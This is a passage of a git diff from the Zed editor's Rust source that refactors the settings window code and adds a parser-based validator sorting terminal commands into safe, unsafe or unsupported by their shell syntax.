// update_plan updates UI-visible planning state but does not use + // tool permission rules. + "update_plan", ]; let tool_info_ids: Vec<&str> = TOOLS.iter().map(|t| t.id).collect(); diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index 9ac338f7b849a53c402a0cea6b79ddc6496df0f2..4c7a98f6c0fa94e659a6db4e00aa28e2b4516e13 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -33,7 +33,7 @@ use std::{ sync::{Arc, LazyLock, RwLock}, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Banner, ContextMenu, Divider, DropdownMenu, DropdownStyle, IconButtonShape, KeyBinding, KeybindingHint, PopoverMenu, Scrollbars, Switch, Tooltip, TreeViewItem, WithScrollbar, @@ -392,29 +392,22 @@ pub fn init(cx: &mut App) { let queue = ProjectSettingsUpdateQueue::new(cx); cx.set_global(queue); + cx.on_action(|_: &OpenSettings, cx| { + open_settings_editor(None, None, None, cx); + }); + cx.observe_new(|workspace: &mut workspace::Workspace, _, _| { workspace - .register_action( - |workspace, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); - open_settings_editor(workspace, Some(&path), None, window_handle, cx); - }, - ) - .register_action(|workspace, _: &OpenSettings, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); - open_settings_editor(workspace, None, None, window_handle, cx); + .register_action(|_, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| { + let window_handle = window.window_handle().downcast::(); + open_settings_editor(Some(&path), None, window_handle, cx); + }) + .register_action(|_, _: &OpenSettings, window, cx| { + let window_handle = window.window_handle().downcast::(); + open_settings_editor(None, None, window_handle, cx); }) .register_action(|workspace, _: &OpenProjectSettings, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); + let window_handle = window.window_handle().downcast::(); let target_worktree_id = workspace .project() .read(cx) @@ -425,7 +418,7 @@ pub fn init(cx: &mut App) { .is_dir() .then_some(tree.read(cx).id()) }); - open_settings_editor(workspace, None, target_worktree_id, window_handle, cx); + open_settings_editor(None, target_worktree_id, window_handle, cx); }); }) .detach(); @@ -474,6 +467,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -506,18 +500,18 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::>(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::>(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -529,7 +523,9 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -551,6 +547,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_editable_number_field) .add_basic_renderer::(render_ollama_model_picker) .add_basic_renderer::(render_dropdown) @@ -563,10 +560,9 @@ fn init_renderers(cx: &mut App) { } pub fn open_settings_editor( - _workspace: &mut Workspace, path: Option<&str>, target_worktree_id: Option, - workspace_handle: WindowHandle, + workspace_handle: Option>, cx: &mut App, ) { telemetry::event!("Settings Viewed"); @@ -623,7 +619,8 @@ pub fn open_settings_editor( if let Some(existing_window) = existing_window { existing_window .update(cx, |settings_window, window, cx| { - settings_window.original_window = Some(workspace_handle); + settings_window.original_window = workspace_handle; + window.activate_window(); if let Some(path) = path { open_path(path, settings_window, window, cx); @@ -644,7 +641,9 @@ pub fn open_settings_editor( // We have to defer this to get the workspace off the stack. let path = path.map(ToOwned::to_owned); cx.defer(move |cx| { - let current_rem_size: f32 = theme::ThemeSettings::get_global(cx).ui_font_size(cx).into(); + let current_rem_size: f32 = theme_settings::ThemeSettings::get_global(cx) + .ui_font_size(cx) + .into(); let default_bounds = DEFAULT_ADDITIONAL_WINDOW_SIZE; let default_rem_size = 16.0; @@ -684,7 +683,7 @@ pub fn open_settings_editor( }, |window, cx| { let settings_window = - cx.new(|cx| SettingsWindow::new(Some(workspace_handle), window, cx)); + cx.new(|cx| SettingsWindow::new(workspace_handle, window, cx)); settings_window.update(cx, |settings_window, cx| { if let Some(path) = path { open_path(&path, settings_window, window, cx); @@ -924,9 +923,7 @@ impl SettingsPageItem { Button::new("error-warning", warning) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(Some(IconName::Debug)) - .icon_position(IconPosition::Start) - .icon_color(Color::Error) + .start_icon(Icon::new(IconName::Debug).color(Color::Error)) .tab_index(0_isize) .tooltip(Tooltip::text(setting_item.field.type_name())) .into_any_element(), @@ -991,11 +988,12 @@ impl SettingsPageItem { ("sub-page".into(), sub_page_link.title.clone()), "Configure", ) - .icon(IconName::ChevronRight) .tab_index(0_isize) - .icon_position(IconPosition::End) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ChevronRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .style(ButtonStyle::OutlinedGhost) .size(ButtonSize::Medium) .on_click({ @@ -1124,11 +1122,12 @@ impl SettingsPageItem { ("action-link".into(), action_link.title.clone()), action_link.button_text.clone(), ) - .icon(IconName::ArrowUpRight) .tab_index(0_isize) - .icon_position(IconPosition::End) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .style(ButtonStyle::OutlinedGhost) .size(ButtonSize::Medium) .on_click({ @@ -1397,17 +1396,14 @@ impl PartialEq for ActionLink { } fn all_language_names(cx: &App) -> Vec { - workspace::AppState::global(cx) - .upgrade() - .map_or(vec![], |state| { - state - .languages - .language_names() - .into_iter() - .filter(|name| name.as_ref() != "Zed Keybind Context") - .map(Into::into) - .collect() - }) + let state = workspace::AppState::global(cx); + state + .languages + .language_names() + .into_iter() + .filter(|name| name.as_ref() != "Zed Keybind Context") + .map(Into::into) + .collect() } #[allow(unused)] @@ -1521,7 +1517,7 @@ impl SettingsWindow { }) .detach(); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if let Some(existing_window) = cx .windows() .into_iter() @@ -1538,29 +1534,26 @@ impl SettingsWindow { }) .detach(); - if let Some(app_state) = AppState::global(cx).upgrade() { - let workspaces: Vec> = app_state - .workspace_store - .read(cx) - .workspaces() - .filter_map(|weak| weak.upgrade()) - .collect(); + let app_state = AppState::global(cx); + let workspaces: Vec> = app_state + .workspace_store + .read(cx) + .workspaces() + .filter_map(|weak| weak.upgrade()) + .collect(); - for workspace in workspaces { - let project = workspace.read(cx).project().clone(); - cx.observe_release_in(&project, window, |this, _, window, cx| { - this.fetch_files(window, cx) - }) - .detach(); - cx.subscribe_in(&project, window, Self::handle_project_event) - .detach(); - cx.observe_release_in(&workspace, window, |this, _, window, cx| { - this.fetch_files(window, cx) - }) + for workspace in workspaces { + let project = workspace.read(cx).project().clone(); + cx.observe_release_in(&project, window, |this, _, window, cx| { + this.fetch_files(window, cx) + }) + .detach(); + cx.subscribe_in(&project, window, Self::handle_project_event) .detach(); - } - } else { - log::error!("App state doesn't exist when creating a new settings window"); + cx.observe_release_in(&workspace, window, |this, _, window, cx| { + this.fetch_files(window, cx) + }) + .detach(); } let this_weak = cx.weak_entity(); @@ -1574,8 +1567,10 @@ impl SettingsWindow { }; this_weak - .update(cx, |this, cx| { - this.fetch_files(window, cx); + .update(cx, |_, cx| { + cx.defer_in(window, |settings_window, window, cx| { + settings_window.fetch_files(window, cx) + }); cx.observe_release_in(&project, window, |_, _, window, cx| { cx.defer_in(window, |this, window, cx| this.fetch_files(window, cx)); }) @@ -2188,37 +2183,39 @@ impl SettingsWindow { ui_files.reverse(); - let mut missing_worktrees = Vec::new(); + if self.original_window.is_some() { + let mut missing_worktrees = Vec::new(); - for worktree in all_projects(self.original_window.as_ref(), cx) - .flat_map(|project| project.read(cx).visible_worktrees(cx)) - .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id())) - { - let worktree = worktree.read(cx); - let worktree_id = worktree.id(); - let Some(directory_name) = worktree.root_dir().and_then(|file| { - file.file_name() - .map(|os_string| os_string.to_string_lossy().to_string()) - }) else { - continue; - }; + for worktree in all_projects(self.original_window.as_ref(), cx) + .flat_map(|project| project.read(cx).visible_worktrees(cx)) + .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id())) + { + let worktree = worktree.read(cx); + let worktree_id = worktree.id(); + let Some(directory_name) = worktree.root_dir().and_then(|file| { + file.file_name() + .map(|os_string| os_string.to_string_lossy().to_string()) + }) else { + continue; + }; - missing_worktrees.push((worktree_id, directory_name.clone())); - let path = RelPath::empty().to_owned().into_arc(); + missing_worktrees.push((worktree_id, directory_name.clone())); + let path = RelPath::empty().to_owned().into_arc(); - let settings_ui_file = SettingsUiFile::Project((worktree_id, path)); + let settings_ui_file = SettingsUiFile::Project((worktree_id, path)); - let focus_handle = prev_files - .iter() - .find_map(|(prev_file, handle)| { - (prev_file == &settings_ui_file).then(|| handle.clone()) - }) - .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true)); + let focus_handle = prev_files + .iter() + .find_map(|(prev_file, handle)| { + (prev_file == &settings_ui_file).then(|| handle.clone()) + }) + .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true)); - ui_files.push((settings_ui_file, focus_handle)); - } + ui_files.push((settings_ui_file, focus_handle)); + } - self.worktree_root_dirs.extend(missing_worktrees); + self.worktree_root_dirs.extend(missing_worktrees); + } self.files = ui_files; let current_file_still_exists = self @@ -2880,7 +2877,7 @@ impl SettingsWindow { } fn render_sub_page_breadcrumbs(&self) -> impl IntoElement { - h_flex().gap_1().children( + h_flex().min_w_0().gap_1().overflow_x_hidden().children( itertools::intersperse( std::iter::once(self.current_page().title.into()).chain( self.sub_page_stack @@ -3110,9 +3107,11 @@ impl SettingsWindow { if let Some(current_sub_page) = self.sub_page_stack.last() { page_header = h_flex() .w_full() + .min_w_0() .justify_between() .child( h_flex() + .min_w_0() .ml_neg_1p5() .gap_1() .child( @@ -3127,17 +3126,19 @@ impl SettingsWindow { ) .when(current_sub_page.link.in_json, |this| { this.child( - Button::new("open-in-settings-file", "Edit in settings.json") - .tab_index(0_isize) - .style(ButtonStyle::OutlinedGhost) - .tooltip(Tooltip::for_action_title_in( - "Edit in settings.json", - &OpenCurrentFile, - &self.focus_handle, - )) - .on_click(cx.listener(|this, _, window, cx| { - this.open_current_settings_file(window, cx); - })), + div().flex_shrink_0().child( + Button::new("open-in-settings-file", "Edit in settings.json") + .tab_index(0_isize) + .style(ButtonStyle::OutlinedGhost) + .tooltip(Tooltip::for_action_title_in( + "Edit in settings.json", + &OpenCurrentFile, + &self.focus_handle, + )) + .on_click(cx.listener(|this, _, window, cx| { + this.open_current_settings_file(window, cx); + })), + ), ) }) .into_any_element(); @@ -3307,6 +3308,7 @@ impl SettingsWindow { .pt_6() .gap_4() .flex_1() + .min_w_0() .bg(cx.theme().colors().editor_background) .child( v_flex() @@ -3356,9 +3358,7 @@ impl SettingsWindow { } SettingsUiFile::Project((worktree_id, path)) => { let settings_path = path.join(paths::local_settings_file_relative_path()); - let Some(app_state) = workspace::AppState::global(cx).upgrade() else { - return; - }; + let app_state = workspace::AppState::global(cx); let Some((workspace_window, worktree, corresponding_workspace)) = app_state .workspace_store @@ -3646,7 +3646,7 @@ impl SettingsWindow { impl Render for SettingsWindow { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); client_side_decorations( v_flex() @@ -3739,31 +3739,25 @@ fn all_projects( cx: &App, ) -> impl Iterator> { let mut seen_project_ids = std::collections::HashSet::new(); - workspace::AppState::global(cx) - .upgrade() - .map(|app_state| { - app_state - .workspace_store - .read(cx) - .workspaces() - .filter_map(|weak| weak.upgrade()) - .map(|workspace: Entity| workspace.read(cx).project().clone()) - .chain( - window - .and_then(|handle| handle.read(cx).ok()) - .into_iter() - .flat_map(|multi_workspace| { - multi_workspace - .workspaces() - .iter() - .map(|workspace| workspace.read(cx).project().clone()) - .collect::>() - }), - ) - .filter(move |project| seen_project_ids.insert(project.entity_id())) - }) - .into_iter() - .flatten() + let app_state = workspace::AppState::global(cx); + app_state + .workspace_store + .read(cx) + .workspaces() + .filter_map(|weak| weak.upgrade()) + .map(|workspace: Entity| workspace.read(cx).project().clone()) + .chain( + window + .and_then(|handle| handle.read(cx).ok()) + .into_iter() + .flat_map(|multi_workspace| { + multi_workspace + .workspaces() + .map(|workspace| workspace.read(cx).project().clone()) + .collect::>() + }), + ) + .filter(move |project| seen_project_ids.insert(project.entity_id())) } fn open_user_settings_in_workspace( @@ -3938,10 +3932,13 @@ impl ProjectSettingsUpdateQueue { buffer.update(cx, |buffer, cx| { let current_text = buffer.text(); - let new_text = cx + if let Some(new_text) = cx .global::() - .new_text_for_update(current_text, |settings| update(settings, cx)); - buffer.edit([(0..buffer.len(), new_text)], None, cx); + .new_text_for_update(current_text, |settings| update(settings, cx)) + .log_err() + { + buffer.edit([(0..buffer.len(), new_text)], None, cx); + } }); buffer_store @@ -4053,41 +4050,6 @@ fn render_toggle_button + From + Copy>( .into_any_element() } -fn render_number_field( - field: SettingField, - file: SettingsUiFile, - _metadata: Option<&SettingsFieldMetadata>, - window: &mut Window, - cx: &mut App, -) -> AnyElement { - let (_, value) = SettingsStore::global(cx).get_value_from_file(file.to_settings(), field.pick); - let value = value.copied().unwrap_or_else(T::min_value); - - let id = field - .json_path - .map(|p| format!("numeric_stepper_{}", p)) - .unwrap_or_else(|| "numeric_stepper".to_string()); - - NumberField::new(id, value, window, cx) - .tab_index(0_isize) - .on_change({ - move |value, window, cx| { - let value = *value; - update_settings_file( - file.clone(), - field.json_path, - window, - cx, - move |settings, _cx| { - (field.write)(settings, Some(value)); - }, - ) - .log_err(); // todo(settings_ui) don't log err - } - }) - .into_any_element() -} - fn render_editable_number_field( field: SettingField, file: SettingsUiFile, @@ -4171,10 +4133,11 @@ fn render_picker_trigger_button(id: SharedString, label: SharedString) -> Button .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronUpDown) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ChevronUpDown) + .size(IconSize::Small) + .color(Color::Muted), + ) } fn render_font_picker( @@ -4405,7 +4368,7 @@ pub mod test { pub fn register_settings(cx: &mut App) { settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); menu::init(); } @@ -4716,7 +4679,7 @@ pub mod test { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state }); @@ -4890,7 +4853,7 @@ pub mod test { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state }); @@ -5070,7 +5033,7 @@ mod project_settings_update_tests { cx.update(|cx| { let store = settings::SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); menu::init(); let queue = ProjectSettingsUpdateQueue::new(cx); diff --git a/crates/shell_command_parser/src/shell_command_parser.rs b/crates/shell_command_parser/src/shell_command_parser.rs index acfd656787c301d9f7ad61e6a14a052b3bc2924c..2ab42dd36bb10c3ed4a624d4a7196174cff6a141 100644 --- a/crates/shell_command_parser/src/shell_command_parser.rs +++ b/crates/shell_command_parser/src/shell_command_parser.rs @@ -1,8 +1,25 @@ use brush_parser::ast; +use brush_parser::ast::SourceLocation; use brush_parser::word::WordPiece; use brush_parser::{Parser, ParserOptions, SourceInfo}; use std::io::BufReader; +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct TerminalCommandPrefix { + pub normalized: String, + pub display: String, + pub tokens: Vec, + pub command: String, + pub subcommand: Option, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum TerminalCommandValidation { + Safe, + Unsafe, + Unsupported, +} + pub fn extract_commands(command: &str) -> Option> { let reader = BufReader::new(command.as_bytes()); let options = ParserOptions::default(); @@ -17,6 +34,444 @@ pub fn extract_commands(command: &str) -> Option> { Some(commands) } +pub fn extract_terminal_command_prefix(command: &str) -> Option { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = parser.parse_program().ok()?; + let simple_command = first_simple_command(&program)?; + + let mut normalized_tokens = Vec::new(); + let mut display_start = None; + let mut display_end = None; + + if let Some(prefix) = &simple_command.prefix { + for item in &prefix.0 { + if let ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) = item { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + normalized_tokens.push(normalized_assignment); + update_display_bounds(&mut display_start, &mut display_end, word); + } + NormalizedAssignment::Skipped => {} + } + } + } + } + + let command_word = simple_command.word_or_name.as_ref()?; + let command_name = normalize_word(command_word)?; + normalized_tokens.push(command_name.clone()); + update_display_bounds(&mut display_start, &mut display_end, command_word); + + let mut subcommand = None; + if let Some(suffix) = &simple_command.suffix { + for item in &suffix.0 { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(_) => continue, + ast::CommandPrefixOrSuffixItem::Word(word) => { + let normalized_word = normalize_word(word)?; + if !normalized_word.starts_with('-') { + subcommand = Some(normalized_word.clone()); + normalized_tokens.push(normalized_word); + update_display_bounds(&mut display_start, &mut display_end, word); + } + break; + } + _ => break, + } + } + } + + let start = display_start?; + let end = display_end?; + let display = command.get(start..end)?.to_string(); + + Some(TerminalCommandPrefix { + normalized: normalized_tokens.join(" "), + display, + tokens: normalized_tokens, + command: command_name, + subcommand, + }) +} + +pub fn validate_terminal_command(command: &str) -> TerminalCommandValidation { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = match parser.parse_program() { + Ok(program) => program, + Err(_) => return TerminalCommandValidation::Unsupported, + }; + + match program_validation(&program) { + TerminalProgramValidation::Safe => TerminalCommandValidation::Safe, + TerminalProgramValidation::Unsafe => TerminalCommandValidation::Unsafe, + TerminalProgramValidation::Unsupported => TerminalCommandValidation::Unsupported, + } +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum TerminalProgramValidation { + Safe, + Unsafe, + Unsupported, +} + +fn first_simple_command(program: &ast::Program) -> Option<&ast::SimpleCommand> { + let complete_command = program.complete_commands.first()?; + let compound_list_item = complete_command.0.first()?; + let command = compound_list_item.0.first.seq.first()?; + + match command { + ast::Command::Simple(simple_command) => Some(simple_command), + _ => None, + } +} + +fn update_display_bounds(start: &mut Option, end: &mut Option, word: &ast::Word) { + if let Some(location) = word.location() { + let word_start = location.start.index; + let word_end = location.end.index; + *start = Some(start.map_or(word_start, |current| current.min(word_start))); + *end = Some(end.map_or(word_end, |current| current.max(word_end))); + } +} + +enum NormalizedAssignment { + Included(String), + Skipped, +} + +fn normalize_assignment_for_command_prefix( + assignment: &ast::Assignment, + word: &ast::Word, +) -> Option { + let operator = if assignment.append { "+=" } else { "=" }; + let assignment_prefix = format!("{}{}", assignment.name, operator); + + match &assignment.value { + ast::AssignmentValue::Scalar(value) => { + let normalized_value = normalize_word(value)?; + let raw_value = word.value.strip_prefix(&assignment_prefix)?; + let rendered_value = if shell_value_requires_quoting(&normalized_value) { + raw_value.to_string() + } else { + normalized_value + }; + + Some(NormalizedAssignment::Included(format!( + "{assignment_prefix}{rendered_value}" + ))) + } + ast::AssignmentValue::Array(_) => Some(NormalizedAssignment::Skipped), + } +} + +fn shell_value_requires_quoting(value: &str) -> bool { + value.chars().any(|character| { + character.is_whitespace() + || !matches!( + character, + 'a'..='z' + | 'A'..='Z' + | '0'..='9' + | '_' + | '@' + | '%' + | '+' + | '=' + | ':' + | ',' + | '.' + | '/' + | '-' + ) + }) +} + +fn program_validation(program: &ast::Program) -> TerminalProgramValidation { + combine_validations( + program + .complete_commands + .iter() + .map(compound_list_validation), + ) +} + +fn compound_list_validation(compound_list: &ast::CompoundList) -> TerminalProgramValidation { + combine_validations( + compound_list + .0 + .iter() + .map(|item| and_or_list_validation(&item.0)), + ) +} + +fn and_or_list_validation(and_or_list: &ast::AndOrList) -> TerminalProgramValidation { + combine_validations( + std::iter::once(pipeline_validation(&and_or_list.first)).chain( + and_or_list.additional.iter().map(|and_or| match and_or { + ast::AndOr::And(pipeline) | ast::AndOr::Or(pipeline) => { + pipeline_validation(pipeline) + } + }), + ), + ) +} + +fn pipeline_validation(pipeline: &ast::Pipeline) -> TerminalProgramValidation { + combine_validations(pipeline.seq.iter().map(command_validation)) +} + +fn command_validation(command: &ast::Command) -> TerminalProgramValidation { + match command { + ast::Command::Simple(simple_command) => simple_command_validation(simple_command), + ast::Command::Compound(compound_command, redirect_list) => combine_validations( + std::iter::once(compound_command_validation(compound_command)) + .chain(redirect_list.iter().map(redirect_list_validation)), + ), + ast::Command::Function(function_definition) => { + function_body_validation(&function_definition.body) + } + ast::Command::ExtendedTest(test_expr) => extended_test_expr_validation(test_expr), + } +} + +fn simple_command_validation(simple_command: &ast::SimpleCommand) -> TerminalProgramValidation { + combine_validations( + simple_command + .prefix + .iter() + .map(command_prefix_validation) + .chain(simple_command.word_or_name.iter().map(word_validation)) + .chain(simple_command.suffix.iter().map(command_suffix_validation)), + ) +} + +fn command_prefix_validation(prefix: &ast::CommandPrefix) -> TerminalProgramValidation { + combine_validations(prefix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn command_suffix_validation(suffix: &ast::CommandSuffix) -> TerminalProgramValidation { + combine_validations(suffix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn prefix_or_suffix_item_validation( + item: &ast::CommandPrefixOrSuffixItem, +) -> TerminalProgramValidation { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => io_redirect_validation(redirect), + ast::CommandPrefixOrSuffixItem::Word(word) => word_validation(word), + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + combine_validations([assignment_validation(assignment), word_validation(word)]) + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + } +} + +fn io_redirect_validation(redirect: &ast::IoRedirect) -> TerminalProgramValidation { + match redirect { + ast::IoRedirect::File(_, _, target) => match target { + ast::IoFileRedirectTarget::Filename(word) => word_validation(word), + ast::IoFileRedirectTarget::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + _ => TerminalProgramValidation::Safe, + }, + ast::IoRedirect::HereDocument(_, here_doc) => { + if here_doc.requires_expansion { + word_validation(&here_doc.doc) + } else { + TerminalProgramValidation::Safe + } + } + ast::IoRedirect::HereString(_, word) | ast::IoRedirect::OutputAndError(word, _) => { + word_validation(word) + } + } +} + +fn assignment_validation(assignment: &ast::Assignment) -> TerminalProgramValidation { + match &assignment.value { + ast::AssignmentValue::Scalar(word) => word_validation(word), + ast::AssignmentValue::Array(words) => { + combine_validations(words.iter().flat_map(|(key, value)| { + key.iter() + .map(word_validation) + .chain(std::iter::once(word_validation(value))) + })) + } + } +} + +fn word_validation(word: &ast::Word) -> TerminalProgramValidation { + let options = ParserOptions::default(); + let pieces = match brush_parser::word::parse(&word.value, &options) { + Ok(pieces) => pieces, + Err(_) => return TerminalProgramValidation::Unsupported, + }; + + combine_validations( + pieces + .iter() + .map(|piece_with_source| word_piece_validation(&piece_with_source.piece)), + ) +} + +fn word_piece_validation(piece: &WordPiece) -> TerminalProgramValidation { + match piece { + WordPiece::Text(_) + | WordPiece::SingleQuotedText(_) + | WordPiece::AnsiCQuotedText(_) + | WordPiece::EscapeSequence(_) + | WordPiece::TildePrefix(_) => TerminalProgramValidation::Safe, + WordPiece::DoubleQuotedSequence(pieces) + | WordPiece::GettextDoubleQuotedSequence(pieces) => combine_validations( + pieces + .iter() + .map(|inner| word_piece_validation(&inner.piece)), + ), + WordPiece::ParameterExpansion(_) | WordPiece::ArithmeticExpression(_) => { + TerminalProgramValidation::Unsafe + } + WordPiece::CommandSubstitution(command) + | WordPiece::BackquotedCommandSubstitution(command) => { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + match parser.parse_program() { + Ok(_) => TerminalProgramValidation::Unsafe, + Err(_) => TerminalProgramValidation::Unsupported, + } + } + } +} + +fn compound_command_validation( + compound_command: &ast::CompoundCommand, +) -> TerminalProgramValidation { + match compound_command { + ast::CompoundCommand::BraceGroup(brace_group) => { + compound_list_validation(&brace_group.list) + } + ast::CompoundCommand::Subshell(subshell) => compound_list_validation(&subshell.list), + ast::CompoundCommand::ForClause(for_clause) => combine_validations( + for_clause + .values + .iter() + .flat_map(|values| values.iter().map(word_validation)) + .chain(std::iter::once(do_group_validation(&for_clause.body))), + ), + ast::CompoundCommand::CaseClause(case_clause) => combine_validations( + std::iter::once(word_validation(&case_clause.value)) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.cmd.iter().map(compound_list_validation)), + ) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.patterns.iter().map(word_validation)), + ), + ), + ast::CompoundCommand::IfClause(if_clause) => combine_validations( + std::iter::once(compound_list_validation(&if_clause.condition)) + .chain(std::iter::once(compound_list_validation(&if_clause.then))) + .chain(if_clause.elses.iter().flat_map(|elses| { + elses.iter().flat_map(|else_item| { + else_item + .condition + .iter() + .map(compound_list_validation) + .chain(std::iter::once(compound_list_validation(&else_item.body))) + }) + })), + ), + ast::CompoundCommand::WhileClause(while_clause) + | ast::CompoundCommand::UntilClause(while_clause) => combine_validations([ + compound_list_validation(&while_clause.0), + do_group_validation(&while_clause.1), + ]), + ast::CompoundCommand::ArithmeticForClause(_) => TerminalProgramValidation::Unsafe, + ast::CompoundCommand::Arithmetic(_) => TerminalProgramValidation::Unsafe, + } +} + +fn do_group_validation(do_group: &ast::DoGroupCommand) -> TerminalProgramValidation { + compound_list_validation(&do_group.list) +} + +fn function_body_validation(function_body: &ast::FunctionBody) -> TerminalProgramValidation { + combine_validations( + std::iter::once(compound_command_validation(&function_body.0)) + .chain(function_body.1.iter().map(redirect_list_validation)), + ) +} + +fn redirect_list_validation(redirect_list: &ast::RedirectList) -> TerminalProgramValidation { + combine_validations(redirect_list.0.iter().map(io_redirect_validation)) +} + +fn extended_test_expr_validation( + test_expr: &ast::ExtendedTestExprCommand, +) -> TerminalProgramValidation { + extended_test_expr_inner_validation(&test_expr.expr) +} + +fn extended_test_expr_inner_validation(expr: &ast::ExtendedTestExpr) -> TerminalProgramValidation { + match expr { + ast::ExtendedTestExpr::Not(inner) | ast::ExtendedTestExpr::Parenthesized(inner) => { + extended_test_expr_inner_validation(inner) + } + ast::ExtendedTestExpr::And(left, right) | ast::ExtendedTestExpr::Or(left, right) => { + combine_validations([ + extended_test_expr_inner_validation(left), + extended_test_expr_inner_validation(right), + ]) + } + ast::ExtendedTestExpr::UnaryTest(_, word) => word_validation(word), + ast::ExtendedTestExpr::BinaryTest(_, left, right) => { + combine_validations([word_validation(left), word_validation(right)]) + } + } +} + +fn combine_validations( + validations: impl IntoIterator, +) -> TerminalProgramValidation { + let mut saw_unsafe = false; + let mut saw_unsupported = false; + + for validation in validations { + match validation { + TerminalProgramValidation::Unsupported => saw_unsupported = true, + TerminalProgramValidation::Unsafe => saw_unsafe = true, + TerminalProgramValidation::Safe => {} + } + } + + if saw_unsafe { + TerminalProgramValidation::Unsafe + } else if saw_unsupported { + TerminalProgramValidation::Unsupported + } else { + TerminalProgramValidation::Safe + } +} + fn extract_commands_from_program(program: &ast::Program, commands: &mut Vec) -> Option<()> { for complete_command in &program.complete_commands { extract_commands_from_compound_list(complete_command, commands)?; 